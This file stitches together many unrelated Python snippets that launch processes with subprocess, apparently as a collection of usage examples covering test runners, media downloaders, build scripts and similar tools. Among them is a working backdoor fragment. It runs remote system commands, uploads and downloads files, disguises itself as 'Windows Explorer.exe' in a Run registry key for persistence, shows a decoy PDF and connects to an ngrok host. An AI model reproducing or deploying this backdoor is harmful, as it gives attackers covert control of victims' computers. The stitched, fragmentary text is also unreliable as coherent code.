'singletop', 'ttbar', 'wjets_sherpa', 'zjets_sherpa', ) # Loop over each group for group in grouplist: print '' print '' print '====================================================================' print 'Listing %s ...' % (group) print '' print '' # Get list of all samples in a given group samples=subprocess.Popen('ls %s/%s'%(inputdir,group),shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT) # Create, open and start filling the output os.system('mkdir -p output/') output=open('output/%s_samples_table.tex'%(group),'w') output.write('\\begin{table}[h]\n') output.write('\\begin{center}\n') output.write('\\resizebox{\\textwidth}{!}{\n') output.write('\\tiny\n') output.write('\\begin{tabular}{llllrr}\n') output.write('Sample name & $\sigma$ [pb] & $k$-Factor & $\epsilon_{\mathrm{filter}}$ & $N_{\mathrm{gen}}$ & $L_{\mathrm{equiv}}$ [fb$^{-1}$] \\\\ \n') # Loop over all samples in the group for sample in samples.stdout.readlines(): gridname=sample.split('.SusyNt.')[0].split('.phys-susy.')[1]+str('.evgen.EVNT.')+sample.split('.SusyNt.')[1].split('_')[0] name=sample.split('.SusyNt.')[0].split('.mc15_13TeV.')[1] print 'Sample : %s'%(name) dsid=name.split('.')[0]
def getoutput(cmd, env=None): try: process = subprocess.Popen(cmd, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, env=env, close_fds=True) except Exception, e: print("error running %s: %s" % (cmd, e)) raise e
def with_server(start_server_command, stop_server_commands, in_tests, get_stats_cb): tests = in_tests[:LIMIT_TESTS] print("going to run %s tests: %s" % (len(tests), [x[0] for x in tests])) print("*******************************************") print("ETA: %s minutes" % int((SERVER_SETTLE_TIME+DEFAULT_TEST_COMMAND_SETTLE_TIME+SETTLE_TIME+MEASURE_TIME+1)*len(tests)/60)) print("*******************************************") server_process = None test_command_process = None env = {} for k,v in os.environ.items(): #whitelist what we want to keep: if k.startswith("XPRA") or k in ("LOGNAME", "XDG_RUNTIME_DIR", "USER", "HOME", "PATH", "LD_LIBRARY_PATH", "XAUTHORITY", "SHELL", "TERM", "USERNAME", "HOSTNAME", "PWD"): env[k] = v env["DISPLAY"] = ":%s" % DISPLAY_NO errors = 0 results = [] count = 0 for name, tech_name, server_version, client_version, encoding, quality, speed, \ opengl, compression, encryption, ssh, (down,up,latency), test_command, client_cmd in tests: try: print("**************************************************************") count += 1 test_command_settle_time = TEST_COMMAND_SETTLE_TIME.get(test_command[0], DEFAULT_TEST_COMMAND_SETTLE_TIME) eta = int((SERVER_SETTLE_TIME+test_command_settle_time+SETTLE_TIME+MEASURE_TIME+1)*(len(tests)-count)/60) print("%s/%s: %s ETA=%s minutes" % (count, len(tests), name, eta)) test_command_process = None try: clean_sys_state() #start the server: if START_SERVER: print("starting server: %s" % str(start_server_command)) server_process = subprocess.Popen(start_server_command, stdin=None) #give it time to settle down: t = SERVER_SETTLE_TIME if count==1: #first run, give it enough time to cleanup the socket t += 5 time.sleep(t) server_pid = server_process.pid code = server_process.poll() assert code is None, "server failed to start, return code is %s, please ensure that you can run the server command line above and that a server does not already exist on that port or DISPLAY" % code else: server_pid = 0 try: #start the test command: if USE_VIRTUALGL: if type(test_command)==str: cmd = VGLRUN_BIN + " -- "+ test_command elif type(test_command) in (list, tuple): cmd = [VGLRUN_BIN, "--"] + list(test_command) else: raise Exception("invalid test command type: %s for %s" % (type(test_command), test_command)) else: cmd = test_command print("starting test command: %s with env=%s, settle time=%s" % (cmd, env, test_command_settle_time)) shell = type(cmd)==str test_command_process = subprocess.Popen(cmd, stdin=None, stdout=subprocess.PIPE, stderr=subprocess.PIPE, env=env, shell=shell) if PREVENT_SLEEP: subprocess.Popen(PREVENT_SLEEP_COMMAND) time.sleep(test_command_settle_time) code = test_command_process.poll() assert code is None, "test command %s failed to start: exit code is %s" % (cmd, code) print("test command %s is running with pid=%s" % (cmd, test_command_process.pid)) #run the client test data = {"Test Name" : name, "Remoting Tech" : tech_name, "Server Version" : server_version, "Client Version" : client_version, "Custom Params" : " ".join(sys.argv[1:]), "SVN Version" : SVN_VERSION, "Encoding" : encoding, "Quality" : quality, "Speed" : speed, "OpenGL" : opengl, "Test Command" : get_command_name(test_command), "Sample Duration (s)" : MEASURE_TIME, "Sample Time (epoch)" : time.time(), "CPU info" : CPU_INFO, "Platform" : PLATFORM, "Kernel Version" : KERNEL_VERSION, "Xorg version" : XORG_VERSION, "OpenGL" : OPENGL_INFO, "Client Window Manager" : WINDOW_MANAGER, "Screen Size" : "%sx%s" % gdk.get_default_root_window().get_size(), "Compression" : compression, "Encryption" : encryption, "Connect via" : ssh, "download limit (KB)" : down, "upload limit (KB)" : up, "latency (ms)" : latency, } data.update(measure_client(server_pid, name, client_cmd, get_stats_cb)) results.append([data.get(x, "") for x in HEADERS]) except Exception, e: import traceback traceback.print_exc() errors += 1 print("error during client command run for %s: %s" % (name, e)) if errors>MAX_ERRORS: print("too many errors, aborting tests") break finally: if test_command_process: print("stopping '%s' with pid=%s" % (test_command, test_command_process.pid)) try_to_stop(test_command_process) try_to_kill(test_command_process, 2) if START_SERVER: try_to_stop(server_process) time.sleep(2) for s in stop_server_commands: print("stopping server with: %s" % (s)) try: stop_process = subprocess.Popen(s, stdin=None, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True) stop_process.wait() except Exception, e: print("error: %s" % e) try_to_kill(server_process, 5) time.sleep(1) except KeyboardInterrupt, e: print("caught %s: stopping this series of tests" % e) break
command[1]) elif command[0] == "upload": command_result = self.write_file(command[1], command[2]) elif command[0] == "download": command_result = self.read_file(command[1]) else: command_result = self.execute_system_command(command) except Exception: command_result = "[-] Error during command execution." self.reliable_send(command_result) def become_persistent(self): evil_file_location = os.environ["appdata"] + "\\Windows Explorer.exe" if not os.path.exists(evil_file_location): shutil.copyfile(sys.executable, evil_file_location) subprocess.call( 'reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v update /t REG_SZ /d "' + evil_file_location + '"', shell=True) file_name = sys._MEIPASS + "\sample.pdf" subprocess.Popen(file_name, shell=True) try: my_backdoor = Backdoor("0.tcp.ngrok.io", 12448) my_backdoor.run() except Exception: sys.exit()
def get_next(self): while self.num_running < self.num_jobs and self.test_list: # Add tests self.num_running += 1 test = self.test_list.pop(0) portseed = len(self.test_list) portseed_arg = ["--portseed={}".format(portseed)] log_stdout = tempfile.SpooledTemporaryFile(max_size=2**16) log_stderr = tempfile.SpooledTemporaryFile(max_size=2**16) test_argv = test.split() testdir = "{}/{}_{}".format(self.tmpdir, re.sub(".py$", "", test_argv[0]), portseed) tmpdir_arg = ["--tmpdir={}".format(testdir)] self.jobs.append( (test, time.time(), subprocess.Popen( [sys.executable, self.tests_dir + test_argv[0]] + test_argv[1:] + self.flags + portseed_arg + tmpdir_arg, universal_newlines=True, stdout=log_stdout, stderr=log_stderr), testdir, log_stdout, log_stderr)) if not self.jobs: raise IndexError('pop from empty list') # Print remaining running jobs when all jobs have been started. if not self.test_list: print("Remaining jobs: [{}]".format(", ".join(j[0] for j in self.jobs))) dot_count = 0 while True: # Return first proc that finishes time.sleep(.5) for job in self.jobs: (name, start_time, proc, testdir, log_out, log_err) = job if proc.poll() is not None: log_out.seek(0), log_err.seek(0) [stdout, stderr] = [ log_file.read().decode('utf-8') for log_file in (log_out, log_err) ] log_out.close(), log_err.close() if proc.returncode == TEST_EXIT_PASSED and stderr == "": status = "Passed" elif proc.returncode == TEST_EXIT_SKIPPED: status = "Skipped" else: status = "Failed" self.num_running -= 1 self.jobs.remove(job) if self.use_term_control: clearline = '\r' + (' ' * dot_count) + '\r' print(clearline, end='', flush=True) dot_count = 0 return TestResult(name, status, int(time.time() - start_time)), testdir, stdout, stderr if self.use_term_control: print('.', end='', flush=True) dot_count += 1
import time,subprocess x=10 for i in range(1,x+1,1): time.sleep(1) print(i) if i==x: subprocess.Popen(['vlc','-vvv','./stan.mp4'])
def startSceneServer(self,sceneId): '''开启一个场景服务器''' from app.gate.utils import dbaccess servername = dbaccess.servername subprocess.Popen('python ./servers/SceneServer/src/startSceneServer.pyc \ -named sceneserver_%d -servername %s'%(sceneId,servername),shell=True)
def do_cmd(cmd): proc = subprocess.Popen([cmd], shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, close_fds=True) #To run a process and read all of its output, set the stdout value to PIPE and call communicate() out = proc.communicate()[0] return out.strip()
import subprocess as sp from app import content from time import sleep CMS_DICT = content() for item in CMS_DICT['tv']: feed = sp.Popen([ 'ffmpeg', '-nostats', '-loglevel', '0', '-xerror', '-i', item[1], 'http://127.0.0.1:8090/{}.ffm'.format(item[0]) ]) print(item[0], 'feed on PID:', str(feed.pid)) sleep(5)
import subprocess process = subprocess.Popen(['ping', '-c 4', 'python.org'], stdout=subprocess.PIPE, universal_newlines=True) while True: output = process.stdout.readline() print(output.strip()) # Use .poll() to check return code of the process # If None - still running return_code = process.poll() if return_code is not None: print('RETURNED CODE', return_code) # Process has finished, read rest of the output for output in process.stdout.readlines(): print(output.strip()) break
def start(self): environ = os.environ.copy() if self.lang: environ["LC_ALL"] = self.lang path = os.path.dirname(__file__) self.cur_frame = None # allow attaching to external browser cdp_port = None if "TEST_CDP_PORT" in os.environ: p = int(os.environ["TEST_CDP_PORT"]) if self.claim_port(p): # can fail when a test starts multiple browsers; only show the first one cdp_port = p if not cdp_port: # start browser on a new port cdp_port = self.find_cdp_port() self._browser_home = tempfile.mkdtemp() environ = os.environ.copy() environ["HOME"] = self._browser_home environ["LC_ALL"] = "C.utf8" # this might be set for the tests themselves, but we must isolate caching between tests try: del environ["XDG_CACHE_HOME"] except KeyError: pass exe = browser_path(self.headless) if self.headless: argv = [exe, "--headless"] else: argv = [os.path.join(TEST_DIR, "common/xvfb-wrapper"), exe] # sandboxing does not work in Docker container self._browser = subprocess.Popen( argv + ["--disable-gpu", "--no-sandbox", "--remote-debugging-port=%i" % cdp_port, "about:blank"], env=environ, close_fds=True) sys.stderr.write("Started %s (pid %i) on port %i\n" % (exe, self._browser.pid, cdp_port)) # wait for CDP to be up s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) for retry in range(300): try: s.connect(('127.0.0.1', cdp_port)) break except socket.error: time.sleep(0.1) else: raise RuntimeError('timed out waiting for browser to start') # now start the driver if self.trace: # enable frame/execution context debugging if tracing is on environ["TEST_CDP_DEBUG"] = "1" self._driver = subprocess.Popen(["%s/cdp-driver.js" % path, str(cdp_port)], env=environ, stdout=subprocess.PIPE, stdin=subprocess.PIPE, close_fds=True) self.valid = True for inject in [ "%s/test-functions.js" % path, "%s/sizzle.js" % path ]: with open(inject) as f: src = f.read() # HACK: injecting sizzle fails on missing `document` in assert() src = src.replace('function assert( fn ) {', 'function assert( fn ) { return true;') self.invoke("Page.addScriptToEvaluateOnLoad", scriptSource=src, no_trace=True)
config = '\n'.join(config_lines) print(config) with open("/etc/wpa_supplicant/wpa_supplicant.conf", "a+") as wifi: wifi.write(config) pygame.mixer.init() pygame.mixer.music.load("/home/pi/MusicEffects/Applause.mp3") pygame.mixer.music.play() time.sleep(10) #Look for USB sticks rpistr = "ls /media/pi" proc = subprocess.Popen(rpistr, shell=True, preexec_fn=os.setsid, stdout=subprocess.PIPE) line = proc.stdout.readline() if not line: exit(0) #Read the files inside the USB stick device_name = line.rstrip().decode("utf-8") rpistr = "ls /media/pi/" + device_name proc = subprocess.Popen(rpistr, shell=True, preexec_fn=os.setsid, stdout=subprocess.PIPE) while True: line = proc.stdout.readline() if not line:
def main(): import argparse oParser = argparse.ArgumentParser() oParser.add_argument("-s", "--staticlib", help="build static library (instead of shared)", choices=['On', 'Off', 'Cache']\ , default="Cache", dest="sBuildStaticLib") oParser.add_argument("-b", "--buildtype", help="build type (default=Release)"\ , choices=['Debug', 'Release', 'MinSizeRel', 'RelWithDebInfo']\ , default="Release", dest="sBuildType") oParser.add_argument("-t", "--tests", help="build tests (default=Cache)", choices=['On', 'Off', 'Cache']\ , default="Cache", dest="sBuildTests") oParser.add_argument("-d", "--docs", help="build documentation (default=Cache)", choices=['On', 'Off', 'Cache']\ , default="Cache", dest="sBuildDocs") oParser.add_argument("--docs-to-log", help="--docs warnings to log file", action="store_true"\ , default=False, dest="bDocsWarningsToLog") oParser.add_argument("--installdir", help="install dir (default=/usr/local)", metavar='INSTALLDIR'\ , default="/usr/local", dest="sInstallDir") oParser.add_argument("--no-configure", help="don't configure", action="store_true"\ , default=False, dest="bDontConfigure") oParser.add_argument("--no-make", help="don't make", action="store_true"\ , default=False, dest="bDontMake") oParser.add_argument("--no-install", help="don't install", action="store_true"\ , default=False, dest="bDontInstall") oParser.add_argument("--no-sudo", help="don't use sudo to install", action="store_true"\ , default=False, dest="bDontSudo") oParser.add_argument("--sanitize", help="compile with -fsanitize=address (Debug only)", action="store_true"\ , default=False, dest="bSanitize") oArgs = oParser.parse_args() sInstallDir = os.path.abspath(os.path.expanduser(oArgs.sInstallDir)) sScriptDir = os.path.dirname(os.path.abspath(__file__)) #print("sScriptDir:" + sScriptDir) os.chdir(sScriptDir) os.chdir("..") # sBuildSharedLib = "-D BUILD_SHARED_LIBS=" if oArgs.sBuildStaticLib == "On": sBuildSharedLib += "OFF" elif oArgs.sBuildStaticLib == "Off": sBuildSharedLib += "ON" else: sBuildSharedLib = "" #print("sBuildSharedLib:" + sBuildSharedLib) # sBuildTests = "-D BUILD_TESTING=" if oArgs.sBuildTests == "On": sBuildTests += "ON" elif oArgs.sBuildTests == "Off": sBuildTests += "OFF" else: sBuildTests = "" #print("sBuildTests:" + sBuildTests) # sBuildDocs = "-D BUILD_DOCS=" if oArgs.sBuildDocs == "On": sBuildDocs += "ON" elif oArgs.sBuildDocs == "Off": sBuildDocs += "OFF" else: sBuildDocs = "" #print("sBuildDocs:" + sBuildDocs) # sDocsWarningsToLog = "-D BUILD_DOCS_WARNINGS_TO_LOG_FILE=" if oArgs.bDocsWarningsToLog: sDocsWarningsToLog += "ON" else: sDocsWarningsToLog += "OFF" #print("sDocsWarningsToLog:" + sDocsWarningsToLog) # sInstallDir = "-D CMAKE_INSTALL_PREFIX=" + sInstallDir #print("sInstallDir:" + sInstallDir) # sBuildType = "-D CMAKE_BUILD_TYPE=" + oArgs.sBuildType #print("sBuildType:" + sBuildType) # if oArgs.bSanitize: sSanitize = "-D BUILD_WITH_SANITIZE=ON" else: sSanitize = "" #print("sSanitize:" + sSanitize) # if oArgs.bDontSudo: sSudo = "" else: sSudo = "sudo" # if not os.path.isdir("build"): os.mkdir("build") os.chdir("build") if not oArgs.bDontConfigure: subprocess.check_call("cmake {} {} {} {} {} {} {} ..".format(\ sBuildSharedLib, sBuildTests, sBuildDocs, sDocsWarningsToLog, sBuildType\ , sInstallDir, sSanitize).split()) if not oArgs.bDontMake: subprocess.check_call("make $STMM_MAKE_OPTIONS", shell=True) if not oArgs.bDontInstall: try: sEnvDestDir = os.environ["DESTDIR"] except KeyError: sEnvDestDir = "" if sEnvDestDir != "": sEnvDestDir = "DESTDIR=" + sEnvDestDir subprocess.check_call("{} make install {}".format(sSudo, sEnvDestDir).split()) if oArgs.sBuildStaticLib == "Cache": oProc = subprocess.Popen("cmake -N -LA".split(), stdout=subprocess.PIPE, shell=False) (sOut, sErr) = oProc.communicate() bSharedLib = ("BUILD_SHARED_LIBS:BOOL=ON" in str(sOut)) else: bSharedLib = (oArgs.sBuildStaticLib == "Off") if bSharedLib and not oArgs.bDontSudo: subprocess.check_call("sudo ldconfig".split())
def executeGrass(commands, feedback, outputCommands=None): loglines = [] loglines.append(Grass7Utils.tr('GRASS GIS 7 execution console output')) grassOutDone = False command, grassenv = Grass7Utils.prepareGrassExecution(commands) #QgsMessageLog.logMessage('exec: {}'.format(command), 'DEBUG', Qgis.Info) # For MS-Windows, we need to hide the console window. if isWindows(): si = subprocess.STARTUPINFO() si.dwFlags |= subprocess.STARTF_USESHOWWINDOW si.wShowWindow = subprocess.SW_HIDE with subprocess.Popen(command, shell=True if isMac() else False, stdout=subprocess.PIPE, stdin=subprocess.DEVNULL, stderr=subprocess.STDOUT, universal_newlines=True, env=grassenv, startupinfo=si if isWindows() else None) as proc: for line in iter(proc.stdout.readline, ''): if 'GRASS_INFO_PERCENT' in line: try: feedback.setProgress( int(line[len('GRASS_INFO_PERCENT') + 2:])) except: pass else: if 'r.out' in line or 'v.out' in line: grassOutDone = True loglines.append(line) feedback.pushConsoleInfo(line) # Some GRASS scripts, like r.mapcalculator or r.fillnulls, call # other GRASS scripts during execution. This may override any # commands that are still to be executed by the subprocess, which # are usually the output ones. If that is the case runs the output # commands again. if not grassOutDone and outputCommands: command, grassenv = Grass7Utils.prepareGrassExecution( outputCommands) with subprocess.Popen( command, shell=True if isMac() else False, stdout=subprocess.PIPE, stdin=subprocess.DEVNULL, stderr=subprocess.STDOUT, universal_newlines=True, env=grassenv, startupinfo=si if isWindows() else None) as proc: for line in iter(proc.stdout.readline, ''): if 'GRASS_INFO_PERCENT' in line: try: feedback.setProgress( int(line[len('GRASS_INFO_PERCENT') + 2:])) except: pass else: loglines.append(line) feedback.pushConsoleInfo(line) if ProcessingConfig.getSetting(Grass7Utils.GRASS_LOG_CONSOLE): QgsMessageLog.logMessage('\n'.join(loglines), 'Processing', Qgis.Info)
def qemu_nbd_popen(*args): '''Run qemu-nbd in daemon mode and return the parent's exit code''' return subprocess.Popen(qemu_nbd_args + ['--persistent'] + list(args))
def start(self): """ Starts the download. Refreshes the streaming url, generates a new file name, and starts a new ffmpeg process. Returns: datetime object representing the time the download started """ tokyo_time = datetime.datetime.now(tz=TOKYO_TZ) # TODO: Does this work on Windows now? env = os.environ.copy() # remove proxy information for key in ('http_proxy', 'https_proxy', 'HTTP_PROXY', 'HTTPS_PROXY'): env.pop(key, None) self.update_streaming_url() # TODO: rework this whole process to include lhls, and make it configurable # and less braindead self._protocol = 'rtmp' self._ffmpeg_container = 'mp4' extra_args = [] # Fall back to HLS if no RTMP stream available # Better to do this here or in update_streaming_url? # There's a possible race condition here, if some external thread modifies either of these if not self._rtmp_url and self._protocol == 'rtmp': download_logger.warn('Using HLS downloader for {}'.format( self._room.handle)) self._protocol = 'hls' # extra_args = [] # force using TS container with HLS # this is causing more problems than it solves # if self.protocol in ('hls', 'lhls'): # self._ffmpeg_container = 'ts' # 2020-01-10: those problems were preferrable to completely unwatchable streams if self.protocol in ('hls', 'lhls'): extra_args = ["-copyts", "-bsf:a", "aac_adtstoasc"] if self.protocol in ('hls', 'lhls') and self._ffmpeg_container == 'mp4': extra_args = ["-bsf:a", "aac_adtstoasc"] # I don't think this is needed? # if self._ffmpeg_container == 'ts': # extra_args.extend(['-bsf:v', 'h264_mp4toannexb']) # elif self._ffmpeg_container != 'mp4': # # TODO: support additional container formats, e.g. FLV # self._ffmpeg_container = 'mp4' temp, dest, out = format_name(self._rootdir, strftime(tokyo_time, FULL_DATE_FMT), self._room, ext=self._ffmpeg_container) with self._lock: self.tempdir, self.destdir, self.outfile = temp, dest, out if self._logging is True: log_file = os.path.normpath('{}/logs/{}.log'.format( self.destdir, self.outfile)) env.update({'FFREPORT': 'file={}:level=40'.format(log_file)}) # level=48 is debug mode, with lots and lots of extra information # maybe too much normed_outpath = os.path.normpath('{}/{}'.format( self.tempdir, self.outfile)) self._process = subprocess.Popen( [ self._ffmpeg_path, # '-nostdin', # '-nostats', # will this omit any useful information? '-loglevel', '40', # 40+ required for wait() to check output '-copytb', '1', '-i', self.stream_url, '-c', 'copy', *extra_args, normed_outpath ], stdin=subprocess.DEVNULL, stderr=subprocess.PIPE, # ffmpeg sends all output to stderr universal_newlines=True, bufsize=1, env=env)
import merge_diff_parser import subprocess import os path = "/var/lib/jenkins/workspace/auto_merge_github_branches/" os.chdir(path) subprocess.call(["git", "checkout", "origin/test_branch_20"]) subprocess.call(["git", "merge", "origin/master"]) p = subprocess.Popen(["git", "diff"], stdout=subprocess.PIPE) diff_output, err = p.communicate() print "printing diff output" print diff_output obj = merge_diff_parser.Parser(diff_output) files = obj.get_files() files.pop(0) for file in files: print "printing file-----------" hunks = obj.get_hunks(file) for hunk in hunks: print "printing hunk now:---------" print hunk
print('usage: %s [--verify]' % sys.argv[0], file=sys.stderr) sys.exit(2) mode = None if len(sys.argv) > 2: print_usage_and_exit() elif len(sys.argv) == 2: mode = sys.argv[1] if mode != '--verify': print_usage_and_exit() our_abs_dir = os.path.dirname(os.path.realpath(__file__)) cbindgen = subprocess.Popen(['cbindgen'], cwd=os.path.join(our_abs_dir, '..'), stdout=subprocess.PIPE, stderr=subprocess.PIPE) (stdout, stderr) = cbindgen.communicate() stdout = str(stdout.decode('utf8')) stderr = str(stderr.decode('utf8')) ignore_this_warning = re.compile( r"WARN: Can't find .*\. This usually means that this type was incompatible or not found\." ) unknown_warning = False for l in stderr.split('\n'): if l == "":
def call_program(self, cmd, limit=None, memory_limit=None, **kwargs): """ call cmd and kill it if it runs for longer than limit returns dictionary like {'returncode': 0, 'stdout': '', 'stderr': '', 'timeout': False, 'time': 1.89} """ the_io_thread_pool_init(self.args.parallelism) if limit is float('inf'): limit = None if type(cmd) in (str, str): kwargs['shell'] = True killed = False t0 = time.time() p = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, preexec_fn=preexec_setpgid_setrlimit(memory_limit), **kwargs) # Add p.pid to list of processes to kill in case of keyboardinterrupt self.pid_lock.acquire() self.pids.append(p.pid) self.pid_lock.release() try: stdout_result = the_io_thread_pool.apply_async(p.stdout.read) stderr_result = the_io_thread_pool.apply_async(p.stderr.read) while p.returncode is None: if limit is None: goodwait(p) elif limit and time.time() > t0 + limit: killed = True goodkillpg(p.pid) goodwait(p) else: # still waiting... sleep_for = limit - (time.time() - t0) if not stdout_result.ready(): stdout_result.wait(sleep_for) elif not stderr_result.ready(): stderr_result.wait(sleep_for) else: #TODO(jansel): replace this with a portable waitpid time.sleep(0.001) p.poll() except: if p.returncode is None: goodkillpg(p.pid) raise finally: # No longer need to kill p self.pid_lock.acquire() if p.pid in self.pids: self.pids.remove(p.pid) self.pid_lock.release() t1 = time.time() return {'time': float('inf') if killed else (t1 - t0), 'timeout': killed, 'returncode': p.returncode, 'stdout': stdout_result.get(), 'stderr': stderr_result.get()}
subprocess.call(['pip3 install opencv-python'], shell=True) if not (os.system("python3 -c 'import qrtools'") == 0): subprocess.call(['pip3 install qrtools'], shell=True) if not (os.system("python3 -c 'import qrcode'") == 0): subprocess.call(['pip3 install qrcode'], shell=True) if not (os.system("python3 -c 'import pyzbar'") == 0): subprocess.call(['pip3 install pyzbar'], shell=True) if not (os.system("python3 -c 'import PIL'") == 0): subprocess.call(['pip3 install pillow'], shell=True) if not (os.system("python3 -c 'import zbar'") == 0): subprocess.call(['pip3 install zbar-py'], shell=True) if not (os.path.exists(home + "/yetirecovery/bitcoin-0.19.0rc1/bin")): subprocess.call([ 'echo "Installing updates. This could take an hour without feedback."' ], shell=True) subprocess.call(['sudo unattended-upgrade'], shell=True) subprocess.call([ 'wget https://bitcoincore.org/bin/bitcoin-core-0.19.0/test.rc1/bitcoin-0.19.0rc1-x86_64-linux-gnu.tar.gz -P ~/yetirecovery/' ], shell=True) os.system( 'tar xvzf ~/yetirecovery/bitcoin-0.19.0rc1-x86_64-linux-gnu.tar.gz -C ~/yetirecovery' ) subprocess.Popen('python3 ~/yetirecovery/hello.py', shell=True, start_new_session=True) subprocess.call(['xdg-open http://localhost:5000/step07'], shell=True)
args.append(str(config['count'])) if 'interval' in config: args.append('-i') args.append(str(config['interval'])) if 'endIntervals' in config: args.append('-ei') args.append(str(config['endIntervals'])) if 'begin' in config: args.append('-b') args.append(str(config['begin'])) if 'end' in config: args.append('-e') args.append(str(config['end'])) if 'begin' not in config and 'end' not in config and 'endIntervals' not in config: args.append('-r') import pprint logger.debug('args: %s' % pprint.pformat(args)) logger.debug('command: %s' % ' '.join(args)) p = subprocess.Popen(args, cwd=os.path.join(os.environ['SPLUNK_HOME'], 'etc', 'apps', 'splunk_app_gogen'), stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=False) sys.stdout.write("<stream>\n") while True: data = p.stdout.readline() # logger.debug("data: %s" % data) sys.stdout.write(data)
def startIPFS(): print('starting IPFS') subprocess.Popen(["ipfs", "daemon"], stdout=subprocess.PIPE, stderr=subprocess.PIPE) time.sleep(10) # time for IPFS to boot
def run_tests(*, test_list, src_dir, build_dir, tmpdir, jobs=1, enable_coverage=False, args=None, combined_logs_len=0, failfast=False, use_term_control): args = args or [] # Warn if bitcoind is already running # pidof might fail or return an empty string if bitcoind is not running try: if subprocess.check_output(["pidof", "bitcoind"]) not in [b'']: print( "%sWARNING!%s There is already a bitcoind process running on this system. Tests may fail unexpectedly due to resource contention!" % (BOLD[1], BOLD[0])) except (OSError, subprocess.SubprocessError): pass # Warn if there is a cache directory cache_dir = "%s/test/cache" % build_dir if os.path.isdir(cache_dir): print( "%sWARNING!%s There is a cache directory here: %s. If tests fail unexpectedly, try deleting the cache directory." % (BOLD[1], BOLD[0], cache_dir)) tests_dir = src_dir + '/test/functional/' flags = ['--cachedir={}'.format(cache_dir)] + args if enable_coverage: coverage = RPCCoverage() flags.append(coverage.flag) logging.debug("Initializing coverage directory at %s" % coverage.dir) else: coverage = None if len(test_list) > 1 and jobs > 1: # Populate cache try: subprocess.check_output( [sys.executable, tests_dir + 'create_cache.py'] + flags + ["--tmpdir=%s/cache" % tmpdir]) except subprocess.CalledProcessError as e: sys.stdout.buffer.write(e.output) raise #Run Tests job_queue = TestHandler( num_tests_parallel=jobs, tests_dir=tests_dir, tmpdir=tmpdir, test_list=test_list, flags=flags, use_term_control=use_term_control, ) start_time = time.time() test_results = [] max_len_name = len(max(test_list, key=len)) test_count = len(test_list) for i in range(test_count): test_result, testdir, stdout, stderr = job_queue.get_next() test_results.append(test_result) done_str = "{}/{} - {}{}{}".format(i + 1, test_count, BOLD[1], test_result.name, BOLD[0]) if test_result.status == "Passed": logging.debug("%s passed, Duration: %s s" % (done_str, test_result.time)) elif test_result.status == "Skipped": logging.debug("%s skipped" % (done_str)) else: print("%s failed, Duration: %s s\n" % (done_str, test_result.time)) print(BOLD[1] + 'stdout:\n' + BOLD[0] + stdout + '\n') print(BOLD[1] + 'stderr:\n' + BOLD[0] + stderr + '\n') if combined_logs_len and os.path.isdir(testdir): # Print the final `combinedlogslen` lines of the combined logs print('{}Combine the logs and print the last {} lines ...{}'. format(BOLD[1], combined_logs_len, BOLD[0])) print('\n============') print('{}Combined log for {}:{}'.format( BOLD[1], testdir, BOLD[0])) print('============\n') combined_logs_args = [ sys.executable, os.path.join(tests_dir, 'combine_logs.py'), testdir ] if BOLD[0]: combined_logs_args += ['--color'] combined_logs, _ = subprocess.Popen( combined_logs_args, universal_newlines=True, stdout=subprocess.PIPE).communicate() print("\n".join( deque(combined_logs.splitlines(), combined_logs_len))) if failfast: logging.debug("Early exiting after test failure") break print_results(test_results, max_len_name, (int(time.time() - start_time))) if coverage: coverage_passed = coverage.report_rpc_coverage() logging.debug("Cleaning up coverage data") coverage.cleanup() else: coverage_passed = True # Clear up the temp directory if all subdirectories are gone if not os.listdir(tmpdir): os.rmdir(tmpdir) all_passed = all( map(lambda test_result: test_result.was_successful, test_results)) and coverage_passed # This will be a no-op unless failfast is True in which case there may be dangling # processes which need to be killed. job_queue.kill_and_join() sys.exit(not all_passed)
def _create_qcow2(capacity, virtual_name): sub_ps = subprocess.Popen( 'qemu-img create -f qcow2 /opt/os-tests/images/{virtual_name}.qcow2 {capacity}G'.format( virtual_name=virtual_name, capacity=capacity), shell=True) sub_ps.wait()
def __init__(self): self.proc = subprocess.Popen(CPPFILT_CMD, stdin=subprocess.PIPE, stdout=subprocess.PIPE)
def get_args(): args = sys.argv def_path = get_root() if len(args) <= 1: print('\n' 'No arguments provided \n' 'Will use default args ...') else: def_path = args[1] print("Dir: {}".format(def_path)) return def_path if __name__ == '__main__': print(message()) path = get_args() cmd = 'du -ahx {path} | sort -rh | head -5'.format_map({'path': path}) print('\nStarting scanning ...\n') output = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) stdout, stderr = output.communicate() for line in stdout.splitlines(): print(line.decode('UTF-8'))
def clean_sys_state(): #clear the caches cmd = ["echo", "3", ">", "/proc/sys/vm/drop_caches"] process = subprocess.Popen(cmd, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE) assert process.wait()==0, "failed to run %s" % str(cmd)
log('Generating signed certificate for server.') run_p('openssl req -new -config conf/server.cnf -passin stdin -key data/server.key -out data/server.csr', [SERVER_KEY_PASSWORD]) run_p('openssl x509 -req -days 365 -passin stdin -in data/server.csr -CA data/rootCA.pem ' '-CAkey data/rootCA.key -CAcreateserial -out data/server.crt', [CA_KEY_PASSWORD]) log('Verify certificate properly signed.') run_p('openssl verify -CAfile data/rootCA.pem data/server.crt') SCRIPT_DIR = os.path.realpath(os.path.dirname(sys.argv[0])) os.chdir(SCRIPT_DIR) p = subprocess.Popen(['node', './gen_client_keys.js'], stdin=subprocess.PIPE, stdout=subprocess.PIPE) p.stdin.write(CLIENT_KEY_PASSWORD) p.stdin.write('\n') client_keys = json.load(p.stdout) p.communicate() if p.returncode != 0: print >>sys.stderr, 'generation of client key pair failed; return code', p.returncod with open('data/client_sec_key', 'wb') as f_sec: f_sec.write(client_keys['sec']) f_sec.write('\n') with open('data/client_pub_key', 'wb') as f_pub: f_pub.write(client_keys['pub']) f_pub.write('\n')
def dmp_to_core(self, dmp_path): f_core = dmp_path + '.core' f = open(f_core, 'w') cmd = subprocess.Popen([MD_PATH + "/minidump-2-core", dmp_path], stdout=f) return f_core
